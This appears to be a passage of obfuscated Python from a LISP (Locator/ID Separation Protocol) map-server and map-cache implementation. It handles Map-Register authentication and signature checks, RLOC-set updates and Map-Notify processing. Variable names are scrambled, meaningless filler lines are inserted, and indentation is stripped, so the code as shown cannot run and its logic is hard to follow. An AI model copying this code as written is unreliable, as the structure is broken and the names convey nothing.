oOO00 = "dynamic " if i1iI11i . dynamic else ""
if 25 - 25: IiII * iIii1I11I1II1
Oo0oOO = bold ( "passed" if I1Iii1IIIiiiI else "failed" , False )
IiII11iI1 = "key-id {}" . format ( IiII11iI1 ) if IiII11iI1 == IIIiI111I . key_id else "bad key-id {}" . format ( IIIiI111I . key_id )
if 38 - 38: O0
lprint ( " Authentication {} for {}EID-prefix {}, {}" . format ( Oo0oOO , oOO00 , green ( i1iiii , False ) , IiII11iI1 ) )
if 14 - 14: i11iIiiIii / O0 . iII111i + II111iiii / OoOoOO00 + OOooOOo
if 68 - 68: OOooOOo + I11i - ooOoO0o * OOooOOo . I11i + I1ii11iIi11i
if 40 - 40: I1ii11iIi11i + I1Ii111 * Oo0Ooo % OoO0O00 % O0 % i1IIi
if 2 - 2: II111iiii + OoOoOO00 - I11i
if 71 - 71: o0oOOo0O0Ooo - I1Ii111
if 45 - 45: II111iiii - OOooOOo / oO0o % O0 . iII111i . iII111i
Oo0OOoO0oO = True
o00i1I11IIIi11I = ( lisp_get_eid_hash ( o0o0Ooo0OO00o . eid ) != None )
if ( o00i1I11IIIi11I or i1iI11i . require_signature ) :
OO0IIiI1Iiii11i = "Required " if i1iI11i . require_signature else ""
i1iiii = green ( i1iiii , False )
iIIiI11 = lisp_find_sig_in_rloc_set ( packet , o0o0Ooo0OO00o . rloc_count )
if ( iIIiI11 == None ) :
Oo0OOoO0oO = False
lprint ( ( " {}EID-crypto-hash signature verification {} " + "for EID-prefix {}, no signature found" ) . format ( OO0IIiI1Iiii11i ,
# ooOoO0o - I11i % OoO0O00 * OoOoOO00 % I1ii11iIi11i
bold ( "failed" , False ) , i1iiii ) )
else :
Oo0OOoO0oO = lisp_verify_cga_sig ( o0o0Ooo0OO00o . eid , iIIiI11 )
Oo0oOO = bold ( "passed" if Oo0OOoO0oO else "failed" , False )
lprint ( ( " {}EID-crypto-hash signature verification {} " + "for EID-prefix {}" ) . format ( OO0IIiI1Iiii11i , Oo0oOO , i1iiii ) )
if 35 - 35: OOooOOo
if 36 - 36: O0 - iII111i * oO0o - O0 / I11i
if 83 - 83: OoooooooOO - i1IIi / i1IIi - ooOoO0o + II111iiii
if 54 - 54: OoOoOO00 * o0oOOo0O0Ooo . OoO0O00
if ( I1Iii1IIIiiiI == False or Oo0OOoO0oO == False ) :
packet = ooOoooO . end_of_rlocs ( packet , o0o0Ooo0OO00o . rloc_count )
if ( packet == None ) :
lprint ( " Could not decode RLOC-record in Map-Register packet" )
return
if 53 - 53: oO0o % OoO0O00 / OoO0O00 / I11i * Oo0Ooo
continue
if 13 - 13: i1IIi % iIii1I11I1II1 - iII111i - I1IiiI - IiII + iIii1I11I1II1
if 22 - 22: IiII - OOooOOo + I1ii11iIi11i
if 64 - 64: OoOoOO00
if 79 - 79: IiII
if 65 - 65: Oo0Ooo - i11iIiiIii * OoOoOO00 . I1Ii111 . iIii1I11I1II1
if 48 - 48: iIii1I11I1II1 - oO0o / OoO0O00 + O0 . Ii1I + I1Ii111
if ( IIIiI111I . merge_register_requested ) :
O0oOoO00O = i1iI11i
O0oOoO00O . inconsistent_registration = False
if 17 - 17: OoOoOO00 . Oo0Ooo - I1Ii111 / I1Ii111 + I11i % i1IIi
if 31 - 31: OoooooooOO . O0 / OoO0O00 . I1Ii111
if 41 - 41: OoooooooOO + iII111i . OOooOOo
if 73 - 73: oO0o + i1IIi + i11iIiiIii / I1ii11iIi11i
if 100 - 100: I1IiiI % ooOoO0o % OoooooooOO / i11iIiiIii + i11iIiiIii % IiII
if ( i1iI11i . group . is_null ( ) ) :
if ( O0oOoO00O . site_id != IIIiI111I . site_id ) :
O0oOoO00O . site_id = IIIiI111I . site_id
O0oOoO00O . registered = False
O0oOoO00O . individual_registrations = { }
O0oOoO00O . registered_rlocs = [ ]
lisp_registered_count -= 1
if 39 - 39: Ii1I % o0oOOo0O0Ooo + OOooOOo / iIii1I11I1II1
if 40 - 40: iIii1I11I1II1 / iII111i % OOooOOo % i11iIiiIii
if 57 - 57: II111iiii % OoO0O00 * i1IIi
III = IIIiI111I . xtr_id
if ( III in i1iI11i . individual_registrations ) :
i1iI11i = i1iI11i . individual_registrations [ III ]
else :
i1iI11i = lisp_site_eid ( I1io0oOOooOoo0oO )
i1iI11i . eid . copy_address ( O0oOoO00O . eid )
i1iI11i . group . copy_address ( O0oOoO00O . group )
i1iI11i . encrypt_json = O0oOoO00O . encrypt_json
O0oOoO00O . individual_registrations [ III ] = i1iI11i
if 19 - 19: ooOoO0o . iIii1I11I1II1 + I1ii11iIi11i + I1ii11iIi11i / o0oOOo0O0Ooo . Oo0Ooo
else :
i1iI11i . inconsistent_registration = i1iI11i . merge_register_requested
if 9 - 9: II111iiii % OoooooooOO
if 4 - 4: i1IIi * i11iIiiIii % OoooooooOO + OoOoOO00 . oO0o
if 95 - 95: I1ii11iIi11i * OoOoOO00 % o0oOOo0O0Ooo / O0 + ooOoO0o % OOooOOo
i1iI11i . map_registers_received += 1
if 48 - 48: i1IIi + IiII - iIii1I11I1II1 . i11iIiiIii % OOooOOo + I1ii11iIi11i
if 95 - 95: ooOoO0o + OoOoOO00 . II111iiii + Ii1I
if 81 - 81: OoooooooOO / OOooOOo / Oo0Ooo
if 26 - 26: iII111i
if 93 - 93: Oo0Ooo + I1IiiI % OoOoOO00 / OOooOOo / I1ii11iIi11i
i1ii1ii11iIi = ( i1iI11i . is_rloc_in_rloc_set ( source ) == False )
if ( o0o0Ooo0OO00o . record_ttl == 0 and i1ii1ii11iIi ) :
lprint ( " Ignore deregistration request from {}" . format ( red ( source . print_address_no_iid ( ) , False ) ) )
if 6 - 6: IiII
continue
if 68 - 68: Oo0Ooo
if 83 - 83: OOooOOo / iIii1I11I1II1 . OoO0O00 - oO0o % Oo0Ooo
if 30 - 30: Ii1I . OoOoOO00 / oO0o . OoO0O00
if 93 - 93: i11iIiiIii
if 33 - 33: i1IIi % OoooooooOO + Oo0Ooo % I1IiiI / ooOoO0o
if 40 - 40: IiII % IiII
IiIi11Iii1Ii = i1iI11i . registered_rlocs
i1iI11i . registered_rlocs = [ ]
if 35 - 35: OoooooooOO % O0 * I1Ii111 - iIii1I11I1II1 % iII111i
if 15 - 15: O0 - Ii1I + OoOoOO00
if 93 - 93: OoO0O00
if 68 - 68: OOooOOo
O0O0oOOOoOoo = packet
for I1I1II1iI in range ( o0o0Ooo0OO00o . rloc_count ) :
ooOoooO = lisp_rloc_record ( )
packet = ooOoooO . decode ( packet , None , i1iI11i . encrypt_json )
if ( packet == None ) :
lprint ( " Could not decode RLOC-record in Map-Register packet" )
return
if 82 - 82: Oo0Ooo - oO0o
ooOoooO . print_record ( " " )
if 36 - 36: Oo0Ooo / Oo0Ooo - o0oOOo0O0Ooo - i11iIiiIii
if 59 - 59: i11iIiiIii / iIii1I11I1II1 / ooOoO0o
if 2 - 2: iII111i + II111iiii
if 88 - 88: i1IIi - iII111i / OOooOOo / i1IIi
if ( len ( I1io0oOOooOoo0oO . allowed_rlocs ) > 0 ) :
O0O0 = ooOoooO . rloc . print_address ( )
if ( O0O0 not in I1io0oOOooOoo0oO . allowed_rlocs ) :
lprint ( ( " Reject registration, RLOC {} not " + "configured in allowed RLOC-set" ) . format ( red ( O0O0 , False ) ) )
if 48 - 48: iII111i / OoooooooOO / iIii1I11I1II1
if 41 - 41: II111iiii - II111iiii - OoO0O00 + oO0o * I11i
i1iI11i . registered = False
packet = ooOoooO . end_of_rlocs ( packet ,
o0o0Ooo0OO00o . rloc_count - I1I1II1iI - 1 )
break
if 77 - 77: IiII % iIii1I11I1II1 - OOooOOo / I1Ii111 / ooOoO0o . iII111i
if 62 - 62: I1Ii111
if 42 - 42: o0oOOo0O0Ooo
if 59 - 59: I1ii11iIi11i % O0 - i1IIi . Oo0Ooo
if 18 - 18: II111iiii
if 31 - 31: Oo0Ooo / Oo0Ooo / iIii1I11I1II1 / I11i % OoooooooOO
iIIiI11 = lisp_rloc ( )
iIIiI11 . store_rloc_from_record ( ooOoooO , None , source )
if 90 - 90: I1IiiI
if 35 - 35: O0
if 10 - 10: Ii1I - I1Ii111 / Oo0Ooo + O0
if 67 - 67: Ii1I % i11iIiiIii . Oo0Ooo
if 78 - 78: I1IiiI - iIii1I11I1II1
if 20 - 20: i11iIiiIii % I1IiiI % OoOoOO00
if ( source . is_exact_match ( iIIiI11 . rloc ) ) :
iIIiI11 . map_notify_requested = IIIiI111I . map_notify_requested
if 85 - 85: I11i + OoOoOO00 * O0 * O0
if 92 - 92: i11iIiiIii
if 16 - 16: I11i . ooOoO0o - Oo0Ooo / OoO0O00 . i1IIi
if 59 - 59: ooOoO0o - ooOoO0o % I11i + OoO0O00
if 88 - 88: Ii1I - ooOoO0o . Oo0Ooo
i1iI11i . registered_rlocs . append ( iIIiI11 )
if 83 - 83: I11i + Oo0Ooo . I1ii11iIi11i * I1ii11iIi11i
if 80 - 80: i1IIi * I11i - OOooOOo / II111iiii * iIii1I11I1II1
iI1oooo = ( i1iI11i . do_rloc_sets_match ( IiIi11Iii1Ii ) == False )
if 97 - 97: I11i
if 60 - 60: O0 * iII111i % I1ii11iIi11i
if 92 - 92: OoOoOO00 / iIii1I11I1II1
if 67 - 67: i1IIi + i11iIiiIii - i1IIi % OoOoOO00
if 3 - 3: I1IiiI % ooOoO0o
if 32 - 32: OOooOOo / i1IIi / OOooOOo
if ( IIIiI111I . map_register_refresh and iI1oooo and
i1iI11i . registered ) :
lprint ( " Reject registration, refreshes cannot change RLOC-set" )
i1iI11i . registered_rlocs = IiIi11Iii1Ii
continue
if 97 - 97: ooOoO0o * Oo0Ooo * OoooooooOO * I1IiiI
if 45 - 45: Oo0Ooo
if 27 - 27: oO0o / IiII - iIii1I11I1II1 / o0oOOo0O0Ooo % OOooOOo * iIii1I11I1II1
if 40 - 40: oO0o - II111iiii * OOooOOo % OoooooooOO
if 52 - 52: OOooOOo + OoO0O00
if 96 - 96: OOooOOo % O0 - Oo0Ooo % oO0o / I1IiiI . i1IIi
if ( i1iI11i . registered == False ) :
i1iI11i . first_registered = lisp_get_timestamp ( )
lisp_registered_count += 1
if 42 - 42: i1IIi
i1iI11i . last_registered = lisp_get_timestamp ( )
i1iI11i . registered = ( o0o0Ooo0OO00o . record_ttl != 0 )
i1iI11i . last_registerer = source
if 52 - 52: OoO0O00 % iII111i % O0
if 11 - 11: i1IIi / i11iIiiIii + Ii1I % Oo0Ooo % O0
if 50 - 50: oO0o . I1Ii111
if 38 - 38: iIii1I11I1II1 . Ii1I
i1iI11i . auth_sha1_or_sha2 = iI1i1I111iI
i1iI11i . proxy_reply_requested = IIIiI111I . proxy_reply_requested
i1iI11i . lisp_sec_present = IIIiI111I . lisp_sec_present
i1iI11i . map_notify_requested = IIIiI111I . map_notify_requested
i1iI11i . mobile_node_requested = IIIiI111I . mobile_node
i1iI11i . merge_register_requested = IIIiI111I . merge_register_requested
if 82 - 82: OOooOOo * Ii1I + I1ii11iIi11i . OoO0O00
i1iI11i . use_register_ttl_requested = IIIiI111I . use_ttl_for_timeout
if ( i1iI11i . use_register_ttl_requested ) :
i1iI11i . register_ttl = o0o0Ooo0OO00o . store_ttl ( )
else :
i1iI11i . register_ttl = LISP_SITE_TIMEOUT_CHECK_INTERVAL * 3
if 15 - 15: O0
i1iI11i . xtr_id_present = IIIiI111I . xtr_id_present
if ( i1iI11i . xtr_id_present ) :
i1iI11i . xtr_id = IIIiI111I . xtr_id
i1iI11i . site_id = IIIiI111I . site_id
if 44 - 44: Ii1I . Oo0Ooo . I1Ii111 + oO0o
if 32 - 32: OOooOOo - II111iiii + IiII * iIii1I11I1II1 - Oo0Ooo
if 25 - 25: ooOoO0o
if 33 - 33: Oo0Ooo
if 11 - 11: I11i
if ( IIIiI111I . merge_register_requested ) :
if ( O0oOoO00O . merge_in_site_eid ( i1iI11i ) ) :
oO0oOOoo0OO0 . append ( [ o0o0Ooo0OO00o . eid , o0o0Ooo0OO00o . group ] )
if 55 - 55: i11iIiiIii * OoOoOO00 - OoOoOO00 * OoO0O00 / iII111i
if ( IIIiI111I . map_notify_requested ) :
lisp_send_merged_map_notify ( lisp_sockets , O0oOoO00O , IIIiI111I ,
o0o0Ooo0OO00o )
if 64 - 64: iIii1I11I1II1 . Ii1I * Oo0Ooo - OoO0O00
if 74 - 74: I1IiiI / o0oOOo0O0Ooo
if 53 - 53: iIii1I11I1II1 * oO0o
if ( iI1oooo == False ) : continue
if ( len ( oO0oOOoo0OO0 ) != 0 ) : continue
if 43 - 43: IiII * Oo0Ooo / OOooOOo % oO0o
oo0OoO0OoOO0O . append ( i1iI11i . print_eid_tuple ( ) )
if 11 - 11: OoOoOO00 * Oo0Ooo / I11i * OOooOOo
if 15 - 15: ooOoO0o - OOooOOo / OoooooooOO
if 41 - 41: OoOoOO00 . iII111i . i1IIi + oO0o
if 60 - 60: oO0o * I1Ii111
if 81 - 81: oO0o - OOooOOo - oO0o
if 54 - 54: oO0o % I11i
if 71 - 71: oO0o / I1ii11iIi11i . Ii1I % II111iiii
iiiii11i = copy . deepcopy ( o0o0Ooo0OO00o )
o0o0Ooo0OO00o = o0o0Ooo0OO00o . encode ( )
o0o0Ooo0OO00o += O0O0oOOOoOoo
OoO0Oo0 = [ i1iI11i . print_eid_tuple ( ) ]
lprint ( " Changed RLOC-set, Map-Notifying old RLOC-set" )
if 41 - 41: I1Ii111 . ooOoO0o - i11iIiiIii + Ii1I . OOooOOo . OoOoOO00
for iIIiI11 in IiIi11Iii1Ii :
if ( iIIiI11 . map_notify_requested == False ) : continue
if ( iIIiI11 . rloc . is_exact_match ( source ) ) : continue
lisp_build_map_notify ( lisp_sockets , o0o0Ooo0OO00o , OoO0Oo0 , 1 , iIIiI11 . rloc ,
LISP_CTRL_PORT , IIIiI111I . nonce , IIIiI111I . key_id ,
IIIiI111I . alg_id , IIIiI111I . auth_len , I1io0oOOooOoo0oO , False )
if 70 - 70: i1IIi % OoOoOO00 / iII111i + i11iIiiIii % ooOoO0o + IiII
if 58 - 58: OOooOOo / i11iIiiIii . Oo0Ooo % iII111i
if 92 - 92: OoOoOO00 / ooOoO0o % iII111i / iIii1I11I1II1
if 73 - 73: O0 % i11iIiiIii
if 16 - 16: O0
lisp_notify_subscribers ( lisp_sockets , iiiii11i , O0O0oOOOoOoo ,
i1iI11i . eid , I1io0oOOooOoo0oO )
if 15 - 15: i1IIi % i11iIiiIii
if 18 - 18: Ii1I . OoO0O00 . iII111i * oO0o + O0
if 35 - 35: OoOoOO00 . oO0o / II111iiii
if 97 - 97: Ii1I + I1Ii111 / II111iiii
if 14 - 14: iII111i / IiII / oO0o
if ( len ( oO0oOOoo0OO0 ) != 0 ) :
lisp_queue_multicast_map_notify ( lisp_sockets , oO0oOOoo0OO0 )
if 55 - 55: OoO0O00 % O0
if 92 - 92: OoooooooOO / O0
if 14 - 14: i11iIiiIii
if 43 - 43: OOooOOo
if 79 - 79: iII111i % Oo0Ooo . i1IIi % ooOoO0o
if 93 - 93: OoOoOO00
if ( IIIiI111I . merge_register_requested ) : return
if 49 - 49: i1IIi * OOooOOo % I11i * Ii1I . I1Ii111 * iIii1I11I1II1
if 72 - 72: ooOoO0o
if 63 - 63: Oo0Ooo . OoO0O00 . OoooooooOO / i1IIi
if 53 - 53: OOooOOo * O0 . iII111i
if 3 - 3: OoooooooOO * I1Ii111 * IiII - OOooOOo * I1Ii111
if ( IIIiI111I . map_notify_requested and I1io0oOOooOoo0oO != None ) :
lisp_build_map_notify ( lisp_sockets , Oo0O0OO , oo0OoO0OoOO0O ,
IIIiI111I . record_count , source , sport , IIIiI111I . nonce ,
IIIiI111I . key_id , IIIiI111I . alg_id , IIIiI111I . auth_len ,
I1io0oOOooOoo0oO , True )
if 78 - 78: iII111i
return
if 80 - 80: i1IIi * I1IiiI + OOooOOo
if 91 - 91: I1IiiI % OoOoOO00 * Oo0Ooo / I1ii11iIi11i
if 57 - 57: i11iIiiIii / o0oOOo0O0Ooo . II111iiii
if 63 - 63: O0
if 64 - 64: i11iIiiIii / oO0o . oO0o - Oo0Ooo
if 48 - 48: i1IIi + I1ii11iIi11i + I1Ii111 - iII111i
if 3 - 3: i1IIi + OoooooooOO * ooOoO0o + I1Ii111 % OOooOOo / IiII
if 70 - 70: oO0o + i1IIi % o0oOOo0O0Ooo - I11i
def lisp_process_unicast_map_notify ( lisp_sockets , packet , source ) :
i1111 = lisp_map_notify ( "" )
packet = i1111 . decode ( packet )
if ( packet == None ) :
lprint ( "Could not decode Map-Notify packet" )
return
if 74 - 74: i11iIiiIii
if 93 - 93: I1Ii111 % OOooOOo * I1IiiI % iII111i / iIii1I11I1II1 + OoO0O00
i1111 . print_notify ( )
if ( i1111 . record_count == 0 ) : return
if 6 - 6: I11i
O00o0Oo = i1111 . eid_records
if 62 - 62: Ii1I
for iIi1iIIIiIiI in range ( i1111 . record_count ) :
o0o0Ooo0OO00o = lisp_eid_record ( )
O00o0Oo = o0o0Ooo0OO00o . decode ( O00o0Oo )
if ( packet == None ) : return
o0o0Ooo0OO00o . print_record ( " " , False )
i1iiii = o0o0Ooo0OO00o . print_eid_tuple ( )
if 75 - 75: o0oOOo0O0Ooo * i11iIiiIii - OoooooooOO * OOooOOo
if 11 - 11: oO0o
if 14 - 14: OoooooooOO . I1ii11iIi11i % I1IiiI / I1IiiI % Oo0Ooo
if 97 - 97: i1IIi
if 6 - 6: Ii1I
I11iiI1III = lisp_map_cache_lookup ( o0o0Ooo0OO00o . eid , o0o0Ooo0OO00o . eid )
if ( I11iiI1III == None ) :
oO0ooOOO = green ( i1iiii , False )
lprint ( "Ignoring Map-Notify EID {}, no subscribe-request entry" . format ( oO0ooOOO ) )
if 43 - 43: i1IIi - Ii1I % iIii1I11I1II1 . OoO0O00 + oO0o - iIii1I11I1II1
continue
if 17 - 17: IiII . i1IIi
if 37 - 37: OoooooooOO + Oo0Ooo - Oo0Ooo + I1ii11iIi11i . I1Ii111 / I1IiiI
if 60 - 60: I1IiiI % Ii1I / I1Ii111 + Ii1I
if 43 - 43: I1ii11iIi11i + I11i
if 83 - 83: II111iiii + o0oOOo0O0Ooo - I1Ii111
if 100 - 100: IiII - OoOoOO00 / I11i
if 33 - 33: I1Ii111 * OoOoOO00 . I1ii11iIi11i % I1Ii111
if ( I11iiI1III . action != LISP_SEND_PUBSUB_ACTION ) :
if ( I11iiI1III . subscribed_eid == None ) :
oO0ooOOO = green ( i1iiii , False )
lprint ( "Ignoring Map-Notify for non-subscribed EID {}" . format ( oO0ooOOO ) )
if 87 - 87: Oo0Ooo
continue
if 65 - 65: ooOoO0o . I1IiiI
if 51 - 51: IiII
if 43 - 43: oO0o - I11i . i11iIiiIii
if 78 - 78: i11iIiiIii + Oo0Ooo * Ii1I - o0oOOo0O0Ooo % i11iIiiIii
if 30 - 30: I1IiiI % oO0o * OoooooooOO
if 64 - 64: I1IiiI
if 11 - 11: I1ii11iIi11i % iII111i / II111iiii % ooOoO0o % IiII
if 14 - 14: ooOoO0o / IiII . o0oOOo0O0Ooo
Iii11i1Ii = [ ]
if ( I11iiI1III . action == LISP_SEND_PUBSUB_ACTION ) :
I11iiI1III = lisp_mapping ( o0o0Ooo0OO00o . eid , o0o0Ooo0OO00o . group , [ ] )
I11iiI1III . add_cache ( )
o0oOOOOOO0OO = copy . deepcopy ( o0o0Ooo0OO00o . eid )
OOOo0Oooo = copy . deepcopy ( o0o0Ooo0OO00o . group )
else :
o0oOOOOOO0OO = I11iiI1III . subscribed_eid
OOOo0Oooo = I11iiI1III . subscribed_group
Iii11i1Ii = I11iiI1III . rloc_set
I11iiI1III . delete_rlocs_from_rloc_probe_list ( )
I11iiI1III . rloc_set = [ ]
if 70 - 70: O0
if 67 - 67: Ii1I + II111iiii . i1IIi - i11iIiiIii + o0oOOo0O0Ooo
if 72 - 72: OOooOOo . ooOoO0o / Ii1I / iIii1I11I1II1 - IiII - ooOoO0o
if 7 - 7: OoOoOO00 + i1IIi % ooOoO0o * I11i + i11iIiiIii / II111iiii
if 2 - 2: O0 / o0oOOo0O0Ooo - OoO0O00 * II111iiii
I11iiI1III . mapping_source = None if source == "lisp-itr" else source
I11iiI1III . map_cache_ttl = o0o0Ooo0OO00o . store_ttl ( )
I11iiI1III . subscribed_eid = o0oOOOOOO0OO
I11iiI1III . subscribed_group = OOOo0Oooo
if 4 - 4: I1IiiI + Oo0Ooo . iIii1I11I1II1
if 100 - 100: i11iIiiIii
if 21 - 21: OoOoOO00 + iII111i . OoO0O00
if 79 - 79: i11iIiiIii - OoO0O00 * OoO0O00 * i1IIi / iIii1I11I1II1 + iII111i
if 27 - 27: iII111i / Ii1I / iII111i + OoooooooOO - O0 + OoO0O00
if ( len ( Iii11i1Ii ) != 0 and o0o0Ooo0OO00o . rloc_count == 0 ) :
I11iiI1III . build_best_rloc_set ( )
lisp_write_ipc_map_cache ( True , I11iiI1III )
lprint ( "Update {} map-cache entry with no RLOC-set" . format ( green ( i1iiii , False ) ) )
if 62 - 62: iIii1I11I1II1
continue
if 60 - 60: Oo0Ooo % IiII % OoO0O00 - i11iIiiIii
if 53 - 53: i11iIiiIii + OoooooooOO
if 23 - 23: i11iIiiIii - IiII - I1ii11iIi11i + I1ii11iIi11i % I1IiiI
if 79 - 79: II111iiii / OoooooooOO
if 35 - 35: i1IIi + IiII + II111iiii % OOooOOo
if 25 - 25: I11i + i11iIiiIii + O0 - Ii1I
if 69 - 69: I11i . OoOoOO00 / OOooOOo / i1IIi . II111iiii
I11Ii1I1I1111 = iiI1iIIIi1I1 = 0
for I1I1II1iI in range ( o0o0Ooo0OO00o . rloc_count ) :
ooOoooO = lisp_rloc_record ( )
O00o0Oo = ooOoooO . decode ( O00o0Oo , None )
ooOoooO . print_record ( " " )
if 65 - 65: OoooooooOO % OoooooooOO * o0oOOo0O0Ooo . IiII . o0oOOo0O0Ooo / OOooOOo
if 72 - 72: OoOoOO00 . Ii1I % IiII . OoOoOO00 - i11iIiiIii % II111iiii
if 15 - 15: I1ii11iIi11i * Ii1I . o0oOOo0O0Ooo - II111iiii . i11iIiiIii . iIii1I11I1II1
if 81 - 81: i1IIi * O0 - OOooOOo + i1IIi
III11i1 = False
for iiiI1I in Iii11i1Ii :
if ( iiiI1I . rloc . is_exact_match ( ooOoooO . rloc ) ) :
III11i1 = True
break
if 4 - 4: iII111i * OoOoOO00 % I11i / OoOoOO00 - I1Ii111 / o0oOOo0O0Ooo
if 24 - 24: i11iIiiIii % I1IiiI - ooOoO0o . OOooOOo
if ( III11i1 ) :
iIIiI11 = copy . deepcopy ( iiiI1I )
iiI1iIIIi1I1 += 1
else :
iIIiI11 = lisp_rloc ( )
I11Ii1I1I1111 += 1
if 62 - 62: OoO0O00 * Oo0Ooo . oO0o + OoO0O00
if 5 - 5: iIii1I11I1II1
if 14 - 14: iII111i
if 66 - 66: oO0o % i1IIi % OoooooooOO
if 58 - 58: OOooOOo
iIIiI11 . store_rloc_from_record ( ooOoooO , None , I11iiI1III . mapping_source )
I11iiI1III . rloc_set . append ( iIIiI11 )
if 89 - 89: iIii1I11I1II1 - i1IIi
if 26 - 26: OOooOOo - iII111i * I1ii11iIi11i / iII111i
lprint ( "Update {} map-cache entry with {}/{} new/replaced RLOCs" . format ( green ( i1iiii , False ) , I11Ii1I1I1111 , iiI1iIIIi1I1 ) )
if 9 - 9: I1Ii111 / II111iiii * I1Ii111 / I11i - OoO0O00
if 36 - 36: IiII . OoOoOO00 . Ii1I
if 31 - 31: iIii1I11I1II1
if 84 - 84: I1ii11iIi11i - iII111i * I1IiiI
if 88 - 88: OOooOOo / Oo0Ooo
I11iiI1III . build_best_rloc_set ( )
lisp_write_ipc_map_cache ( True , I11iiI1III )
if 31 - 31: II111iiii
if 32 - 32: o0oOOo0O0Ooo % o0oOOo0O0Ooo
if 67 - 67: IiII + oO0o * IiII
if 26 - 26: I1ii11iIi11i + i1IIi . i1IIi - oO0o + I1IiiI * o0oOOo0O0Ooo
if 62 - 62: ooOoO0o + ooOoO0o % I11i
if 100 - 100: II111iiii . OoooooooOO
oO00000oOO = lisp_get_map_server ( source )
if ( oO00000oOO == None ) :
lprint ( "Cannot find Map-Server for Map-Notify source address {}" . format ( source . print_address_no_iid ( ) ) )
if 32 - 32: I11i % OOooOOo * O0 / iIii1I11I1II1 / i1IIi
return
if 87 - 87: OoO0O00 . I1ii11iIi11i * I1IiiI
lisp_send_map_notify_ack ( lisp_sockets , O00o0Oo , i1111 , oO00000oOO )
if 83 - 83: OOooOOo
if 86 - 86: I1Ii111 / oO0o
if 67 - 67: OoOoOO00 + Oo0Ooo / i11iIiiIii . I1IiiI
if 53 - 53: Oo0Ooo + IiII * ooOoO0o % OoooooooOO * oO0o . iII111i
if 78 - 78: O0 . Ii1I - I1ii11iIi11i
if 69 - 69: O0 % O0 . oO0o * OoooooooOO
if 13 - 13: i1IIi % oO0o . OoooooooOO + I1ii11iIi11i - OOooOOo
if 99 - 99: OoooooooOO % OOooOOo / I11i
if 77 - 77: II111iiii - IiII % OOooOOo
if 22 - 22: OoooooooOO / oO0o
def lisp_process_multicast_map_notify ( packet , source ) :
i1111 = lisp_map_notify ( "" )
packet = i1111 . decode ( packet )
if ( packet == None ) :
lprint ( "Could not decode Map-Notify packet" )
return
if 78 - 78: oO0o * I11i . i1IIi % i1IIi + i1IIi / OOooOOo
if 66 - 66: OoooooooOO % o0oOOo0O0Ooo / I11i * I1Ii111
i1111 . print_notify ( )
if ( i1111 . record_count == 0 ) : return
if 12 - 12: I1Ii111
O00o0Oo = i1111 . eid_records
if 17 - 17: I1Ii111 % oO0o + O0
for iIi1iIIIiIiI in range ( i1111 . record_count ) :
o0o0Ooo0OO00o = lisp_eid_record ( )
O00o0Oo = o0o0Ooo0OO00o . decode ( O00o0Oo )
if ( packet == None ) : return
o0o0Ooo0OO00o . print_record ( " " , False )
if 15 - 15: o0oOOo0O0Ooo - OoooooooOO % ooOoO0o % oO0o / i11iIiiIii / Oo0Ooo
if 59 - 59: iII111i + O0 - I1ii11iIi11i * I1ii11iIi11i + iIii1I11I1II1
if 41 - 41: iIii1I11I1II1 . O0 - ooOoO0o / OoOoOO00 % iIii1I11I1II1 + IiII
if 23 - 23: OoOoOO00 + ooOoO0o . i11iIiiIii
I11iiI1III = lisp_map_cache_lookup ( o0o0Ooo0OO00o . eid , o0o0Ooo0OO00o . group )
if ( I11iiI1III == None ) :
iIiI1III , Oo0OoO00O , ii1I1I1iII = lisp_allow_gleaning ( o0o0Ooo0OO00o . eid , o0o0Ooo0OO00o . group ,
None )
if ( iIiI1III == False ) : continue
if 86 - 86: Ii1I - o0oOOo0O0Ooo % iII111i
I11iiI1III = lisp_mapping ( o0o0Ooo0OO00o . eid , o0o0Ooo0OO00o . group , [ ] )
I11iiI1III . add_cache ( )
if 37 - 37: Oo0Ooo
if 87 - 87: I1ii11iIi11i . OoooooooOO . ooOoO0o + iIii1I11I1II1 + O0 % I1ii11iIi11i
if 53 - 53: IiII
if 96 - 96: Oo0Ooo . i11iIiiIii / Ii1I . I1ii11iIi11i % I1Ii111
if 68 - 68: ooOoO0o
if 58 - 58: iII111i * I1IiiI
if 82 - 82: Oo0Ooo / OoO0O00 % Oo0Ooo . ooOoO0o * O0
if ( I11iiI1III . gleaned ) :
lprint ( "Ignore Map-Notify for gleaned {}" . format ( green ( I11iiI1III . print_eid_tuple ( ) , False ) ) )
if 39 - 39: I1Ii111 * IiII
continue
if 16 - 16: ooOoO0o + OoO0O00 / I11i * OoO0O00 . Oo0Ooo % OoOoOO00
if 65 - 65: Oo0Ooo / I1Ii111 % II111iiii % Ii1I
I11iiI1III . mapping_source = None if source == "lisp-etr" else source
I11iiI1III . map_cache_ttl = o0o0Ooo0OO00o . store_ttl ( )
if 70 - 70: II111iiii % Oo0Ooo * oO0o
if 54 - 54: O0 / ooOoO0o * I1Ii111
if 5 - 5: Ii1I / OoOoOO00 - O0 * OoO0O00
if 13 - 13: IiII + Oo0Ooo - I1Ii111
if 10 - 10: OOooOOo % OoooooooOO / I1IiiI . II111iiii % iII111i
if ( len ( I11iiI1III . rloc_set ) != 0 and o0o0Ooo0OO00o . rloc_count == 0 ) :
I11iiI1III . rloc_set = [ ]
I11iiI1III . build_best_rloc_set ( )
lisp_write_ipc_map_cache ( True , I11iiI1III )
lprint ( "Update {} map-cache entry with no RLOC-set" . format ( green ( I11iiI1III . print_eid_tuple ( ) , False ) ) )
if 47 - 47: o0oOOo0O0Ooo . i11iIiiIii * i1IIi % I11i - ooOoO0o * oO0o
continue
if 95 - 95: oO0o / Ii1I + OoO0O00
if 57 - 57: iIii1I11I1II1 + I1Ii111 % oO0o - Ii1I . I1IiiI
iIi11Ii = I11iiI1III . rtrs_in_rloc_set ( )
if 70 - 70: oO0o - iII111i + Ii1I * Ii1I / o0oOOo0O0Ooo . o0oOOo0O0Ooo
if 41 - 41: I1Ii111 % Oo0Ooo - iIii1I11I1II1
if 96 - 96: I1Ii111 / II111iiii . oO0o + oO0o
if 62 - 62: I1IiiI
if 22 - 22: i11iIiiIii . Ii1I . Oo0Ooo * Oo0Ooo - iII111i / I1ii11iIi11i
for I1I1II1iI in range ( o0o0Ooo0OO00o . rloc_count ) :
ooOoooO = lisp_rloc_record ( )
O00o0Oo = ooOoooO . decode ( O00o0Oo , None )
ooOoooO . print_record ( " " )
if ( o0o0Ooo0OO00o . group . is_null ( ) ) : continue
if ( ooOoooO . rle == None ) : continue
if 49 - 49: iII111i + I11i . Oo0Ooo
if 23 - 23: I1IiiI . Ii1I + ooOoO0o . OoooooooOO
if 57 - 57: OOooOOo / OoOoOO00 / i11iIiiIii - I11i - I11i . Ii1I
if 53 - 53: ooOoO0o . iII111i + Ii1I * I1Ii111
